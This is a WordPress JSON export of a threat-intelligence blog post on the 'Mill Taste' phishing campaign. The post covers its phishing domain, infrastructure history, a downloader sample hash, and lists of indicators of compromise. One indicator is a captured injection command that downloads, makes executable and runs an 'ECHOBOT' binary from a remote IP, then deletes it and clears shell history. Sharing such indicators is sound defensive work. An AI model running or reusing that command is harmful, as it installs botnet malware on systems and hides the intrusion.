{"id":341,"date":"2019-10-28T00:00:00","date_gmt":"2019-10-28T00:00:00","guid":{"rendered":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/"},"modified":"2024-06-23T23:06:27","modified_gmt":"2024-06-23T23:06:27","slug":"the-mill-taste-campaign","status":"publish","type":"post","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","title":{"rendered":"The &#8220;Mill Taste&#8221; Campaign"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"341\" class=\"elementor elementor-341\" data-elementor-post-type=\"post\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4ee363ae e-flex e-con-boxed e-con e-parent\" data-id=\"4ee363ae\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-263187af elementor-widget elementor-widget-text-editor\" data-id=\"263187af\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><!-- Global site tag (gtag.js) - Google Analytics --><\/p><p>An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website.\u00a0 The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa Henry\u201d who is sending a \u201ccopy\u201d of a paid invoice.\u00a0 In fact, it has attached a PDF and is coming with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware which will be described below.<\/p><h3><strong>Phishing Campaign Cyber Observables<\/strong><\/h3><p>The phishing domain is:\u00a0 elmolinosabor[.]com<\/p><p>The phishing IP is:\u00a0 146.112.61[.]107<\/p><h3><strong>Recent DNS History<\/strong><\/h3><p>The threat actor appears to have begun building his infrastructure on February 1, 2019 using an admin panel labeled \u201cl5fa7189.justinstalledpanel.com\u201d at IP: 94.102.60.165.\u00a0 From the DNS history tracked by [<span style=\"color: #3366ff;\"><em>redacted<\/em><\/span>] it appears that the initial test run of the malicious infrastructure was on June 5<sup>th<\/sup> and 8<sup>th<\/sup> from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.<\/p><p>The same Splash page for all three of these events is showing as the same \u2018Welcome!\u2019 placeholder.<\/p><p>According to the [<em><span style=\"color: #3366ff;\">redacted<\/span><\/em>] tool the autonomous system network for the above noted IP is:\u00a0 AS202425 which is exhibiting multiple security issues including:<\/p><ul><li>Route leaks (4)<\/li><li>Hijacks (111)<\/li><li>DDoS Amplifiers (326)<\/li><li>Static Loops (5)<\/li><\/ul><h3><strong>Malware Artifacts<\/strong><\/h3><p>The most recently seen malware artifact as documented on [<span style=\"color: #3366ff;\"><em>redacted<\/em><\/span>] was the following WIN32 executable:\u00a0 scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9).As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a &#8220;heuristic&#8221;\u00a0 &#8220;downloader&#8221; and a &#8220;Grandcrab.AF&#8221; Trojan.<\/p><p>As the viewer can see from the above screenshot the executable file is beaconing out to a Seychelles site and a .zz site (the question mark [?]) shown on the node graph representation. There are numerous &#8220;communicating&#8221; and referring nodes also associated with the .zz node identified by [<em><span style=\"color: #3366ff;\">redacted<\/span><\/em>] as Hanover Hospital.\u00a0 The Cyber Observables for this campaign are given below.<\/p><p>Contact <a href=\"https:\/\/ctin.us\/site\/about-us\/contact\/\" target=\"_blank\" rel=\"noopener noreferrer\">CTIN<\/a> for more information and the complete list of Cyber Observables of the Mill Taste Campaign.<\/p><h3><strong>Dropper Site Cyber Observables<\/strong><\/h3><p>533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9,<br \/>94.102.60.165,<br \/>10.0.2.15,<br \/>http:\/\/94.102.60.165\/log\/adm.php,<br \/>http:\/\/94.102.60.165\/check.dll,<br \/>http:\/\/94.102.60.165\/mail.dll,<br \/>http:\/\/94.102.60.165\/sun\/check.dll,<br \/>http:\/\/94.102.60.165\/sea\/indexh.php?&amp;1001=2&amp;99=15&amp;f1=ssleay32.dll,<br \/>http:\/\/94.102.60.165\/sun\/indexh.php?&amp;1001=2&amp;99=15&amp;f1=ssleay32.dll,<br \/>http:\/\/94.102.60.165\/sun\/indexh.php?&amp;1001=2&amp;99=15&amp;f1=libeay32.dll,<br \/>http:\/\/10.0.2.15:1041%s\/,<br \/>http:\/\/94.102.60.165\/sun\/indexh.php?&amp;1001=2&amp;99=0&amp;f1=7z.dll,<br \/>http:\/\/94.102.60.165\/sun\/indexh.php?&amp;1001=2,<br \/>http:\/\/94.102.60.165\/sea\/indexh.php?&amp;1001=4&amp;req=3&amp;<\/p><h3>Communicating Nodes Cyber Observables<\/h3><p>12c7e0c472a50b29530a0417659d758079d7cfa9557ea224d95ea92745cb0ac3,<br \/>5f4ec26b34a5dcb26590128a6c99b8391f00cb7fcba301a25291b33bf27b65b3,<br \/>d691b01806cc91407f560e4a1ee2bad5d817cab98989f7e7353dc8c0e1239c48,<br \/>a1510186f29e0c0b5e0c01a986ecb4e16938be0fba3c2f19d81374f4130317cf,<br \/>2e14332b9b4c8c1b36dbd6515ac7e5212d0e634792415feeb8eb25134b09ca0d,<br \/>adb17860802b2a9e5dd10e603b4034142ee35a00474f7a13b6474f24be880510,<br \/>723d9a74f82c1eeae07e4ce8bb2580b8b60673311d04384284809f96e5cb2d6e,<br \/>1e12793127168b505dac74e0ba56e268afaf8f9cc819c70e09bd84583a7fdd6f,<br \/>cdac6989937bd374e5a4c7e58a91f68c0bb409c1d58034a5c8670144bde6d762,<br \/>7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814,<br \/>w1-runnerscaleoutcitusgroup637078724425217418.postgres.database.azure.com,<br \/>runnercitus-eastus-348e85ea-4.postgres.database.azure.com,<br \/>w0-runnerscaleoutcitusgroup637078580419087604.postgres.database.azure.com,<br \/>runnercitus-eastus-1be96d43-3.postgres.database.azure.com,<br \/>w1-runnerscaleoutcitusgroup637078436412997021.postgres.database.azure.com,<br \/>pantos-msk.d4honm.c2.kafka.ap-northeast-2.amazonaws.com,<br \/>runnercitus-eastus-d6febfab-2.postgres.database.azure.com,<br \/>w1-runnerscaleoutcitusgroup637078292406906669.postgres.database.azure.com,<br \/>cfnlaunchpadcanarytes.ydze9e.c4.kafka.eu-north-1.amazonaws.com,<br \/>w0-runnerscaleoutcitusgroup637078148400702433.postgres.database.azure.com,<br \/>http:\/\/10.0.2.15\/bot\/config.bin,<br \/>http:\/\/10.0.2.15:1037\/click\/dtype=stred\/pid=12\/cid=72435\/path=%25s\/*,<br \/>http:\/\/yuemahui.f3322.org\/,<br \/>http:\/\/10.0.2.15\/repository\/annotate?rev=cd \/tmp; wget http:\/\/31.13.195.251\/ECHO\/ECHOBOT.x86; chmod 777 ECHOBOT.x86; .\/ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c,<br \/>http:\/\/gxga.3322.org\/,<br \/>http:\/\/jjteng.3322.org\/,<br \/>http:\/\/chenyunfei.3322.org\/,<br \/>https:\/\/yuemahui.f3322.org\/,<br \/>https:\/\/populire.servecounterstrike.com\/,<br \/>http:\/\/populire.servecounterstrike.com\/,<br \/>7d7c9c2deb475c3e7c77f5b9fff03dc6bddced25115232b68112acfead57c2a1,<br \/>0439751586a1856bc8feb48535c4055f51835b679e386d083a2c98d47181218f,<br \/>b2a9f53b52998f213675a332df13f0e66800277dde678c42c446f18bd6424798,<br \/>37269f57bad0f2d954f2aa2892b89bbad10278e84e035b4a4db78f1c6a408d8e,<br \/>47a309f76a12f39d77f155f5e548ac10126db993c1f619c6810ca71793f77734,<br \/>de9d727e15ea3ddbe9eb3a49ae083e5cca23f9fbf8cdd5d76021e3cea37cb2af,<br \/>5d393cdd0d4c8813f9c86121d6279d85232316bbe993ea1fb6f8f4471efb5d8a,<br \/>6ab990ea783a1e28783b79d123525d434f93b7214014d0cd8071889f82108562,<br \/>dda022507ffdcb2eb82534a3224f0862eb76faaacedc91b3fb1b06fcfc35c10c,<br \/>7c99c2bd71448f2bb930772c4acfeb534472817d9e1493059eebea66b493fcb7<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website.\u00a0 The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4265,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"elementor_theme","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[229],"tags":[152],"class_list":["post-341","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware","tag-malware"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO Pro 4.9.5.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Jane Ginn\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO Pro (AIOSEO) 4.9.5.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"CTIN - Cybersecurity Center\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"The \u201cMill Taste\u201d Campaign - CTIN\" \/>\n\t\t<meta property=\"og:description\" content=\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png\" \/>\n\t\t<meta property=\"og:image:width\" content=\"112\" \/>\n\t\t<meta property=\"og:image:height\" content=\"112\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-28T00:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2024-06-23T23:06:27+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/CyberThreatIntelligenceNetwork\/\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary\" \/>\n\t\t<meta name=\"twitter:site\" content=\"@CTIN_Global\" \/>\n\t\t<meta name=\"twitter:title\" content=\"The \u201cMill Taste\u201d Campaign - CTIN\" \/>\n\t\t<meta name=\"twitter:description\" content=\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa\" \/>\n\t\t<meta name=\"twitter:creator\" content=\"@CTIN_Global\" \/>\n\t\t<meta name=\"twitter:image\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"BlogPosting\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#blogposting\",\"name\":\"The \\u201cMill Taste\\u201d Campaign - CTIN\",\"headline\":\"The &#8220;Mill Taste&#8221; Campaign\",\"author\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/GlobalConnections-RightSize.jpg\",\"width\":1680,\"height\":836},\"datePublished\":\"2019-10-28T00:00:00+00:00\",\"dateModified\":\"2024-06-23T23:06:27+00:00\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#webpage\"},\"articleSection\":\"Malware, malware\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/#listItem\",\"name\":\"Posts\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/#listItem\",\"position\":2,\"name\":\"Posts\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/#listItem\",\"name\":\"COTH\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/#listItem\",\"position\":3,\"name\":\"COTH\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/#listItem\",\"name\":\"Malware\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/#listItem\",\"name\":\"Posts\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/#listItem\",\"position\":4,\"name\":\"Malware\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#listItem\",\"name\":\"The &#8220;Mill Taste&#8221; Campaign\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/#listItem\",\"name\":\"COTH\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#listItem\",\"position\":5,\"name\":\"The &#8220;Mill Taste&#8221; Campaign\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/#listItem\",\"name\":\"Malware\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#organization\",\"name\":\"Cyber Threat Intelligence Network\",\"description\":\"Cybersecurity Center\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/\",\"telephone\":\"+14804624039\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2021\\\/01\\\/cropped-cropped-2020-logo.png\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#organizationLogo\",\"width\":757,\"height\":237},\"image\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#organizationLogo\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/CyberThreatIntelligenceNetwork\\\/\",\"https:\\\/\\\/twitter.com\\\/CTIN_Global\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/janeginn\\\/\",\"https:\\\/\\\/bsky.app\\\/profile\\\/janeginn.bsky.social\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/\",\"name\":\"Jane Ginn\",\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/rjg-PhonePhoto.PNG\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/CTIN_Global\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/janeginn\\\/\",\"https:\\\/\\\/bsky.app\\\/profile\\\/janeginn.bsky.social\",\"https:\\\/\\\/infosec.exchange\\\/@ctin\"],\"description\":\"As the co-founder of the US-based Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. Her work with the Cyber Threat Intelligence (CTI) technical committee earned her the 2020 Distinguished Contributor award from OASIS. She is currently supporting the analysis services of Datos Insights, an advisory firm focusing on the financial services sector. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. Follow me on LinkedIn\",\"jobTitle\":\"CTIN President & Co-Founder\",\"alumniOf\":[{\"@type\":\"EducationalOrganization\",\"name\":\"Norwich University\",\"sameAs\":\"https:\\\/\\\/online.norwich.edu\\\/online\\\/programs-courses\\\/programs\\\/master-science-cybersecurity\"}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#webpage\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/\",\"name\":\"The \\u201cMill Taste\\u201d Campaign - CTIN\",\"description\":\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \\u201cMill Taste\\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \\u201cAccounting Manager\\u201d by the name of \\u201cMelissa\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/GlobalConnections-RightSize.jpg\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#mainImage\",\"width\":1680,\"height\":836},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#mainImage\"},\"datePublished\":\"2019-10-28T00:00:00+00:00\",\"dateModified\":\"2024-06-23T23:06:27+00:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#website\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/\",\"name\":\"Training Center\",\"description\":\"Cybersecurity Center\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO Pro -->\r\n\t\t<title>The \u201cMill Taste\u201d Campaign - CTIN<\/title>\n\n","aioseo_head_json":{"title":"The \u201cMill Taste\u201d Campaign - CTIN","description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","canonical_url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"BlogPosting","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#blogposting","name":"The \u201cMill Taste\u201d Campaign - CTIN","headline":"The &#8220;Mill Taste&#8221; Campaign","author":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author"},"publisher":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/06\/GlobalConnections-RightSize.jpg","width":1680,"height":836},"datePublished":"2019-10-28T00:00:00+00:00","dateModified":"2024-06-23T23:06:27+00:00","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#webpage"},"isPartOf":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#webpage"},"articleSection":"Malware, malware"},{"@type":"BreadcrumbList","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com#listItem","position":1,"name":"Home","item":"https:\/\/cyberthreatintelligencenetwork.com","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/#listItem","name":"Posts"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/#listItem","position":2,"name":"Posts","item":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/#listItem","name":"COTH"},"previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/#listItem","position":3,"name":"COTH","item":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/#listItem","name":"Malware"},"previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/#listItem","name":"Posts"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/#listItem","position":4,"name":"Malware","item":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#listItem","name":"The &#8220;Mill Taste&#8221; Campaign"},"previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/#listItem","name":"COTH"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#listItem","position":5,"name":"The &#8220;Mill Taste&#8221; Campaign","previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/#listItem","name":"Malware"}}]},{"@type":"Organization","@id":"https:\/\/cyberthreatintelligencenetwork.com\/#organization","name":"Cyber Threat Intelligence Network","description":"Cybersecurity Center","url":"https:\/\/cyberthreatintelligencenetwork.com\/","telephone":"+14804624039","logo":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2021\/01\/cropped-cropped-2020-logo.png","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#organizationLogo","width":757,"height":237},"image":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#organizationLogo"},"sameAs":["https:\/\/www.facebook.com\/CyberThreatIntelligenceNetwork\/","https:\/\/twitter.com\/CTIN_Global","https:\/\/www.linkedin.com\/in\/janeginn\/","https:\/\/bsky.app\/profile\/janeginn.bsky.social"]},{"@type":"Person","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author","url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/","name":"Jane Ginn","image":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/07\/rjg-PhonePhoto.PNG"},"sameAs":["https:\/\/x.com\/CTIN_Global","https:\/\/www.linkedin.com\/in\/janeginn\/","https:\/\/bsky.app\/profile\/janeginn.bsky.social","https:\/\/infosec.exchange\/@ctin"],"description":"As the co-founder of the US-based Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. Her work with the Cyber Threat Intelligence (CTI) technical committee earned her the 2020 Distinguished Contributor award from OASIS. She is currently supporting the analysis services of Datos Insights, an advisory firm focusing on the financial services sector. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. Follow me on LinkedIn","jobTitle":"CTIN President & Co-Founder","alumniOf":[{"@type":"EducationalOrganization","name":"Norwich University","sameAs":"https:\/\/online.norwich.edu\/online\/programs-courses\/programs\/master-science-cybersecurity"}]},{"@type":"WebPage","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#webpage","url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","name":"The \u201cMill Taste\u201d Campaign - CTIN","description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of 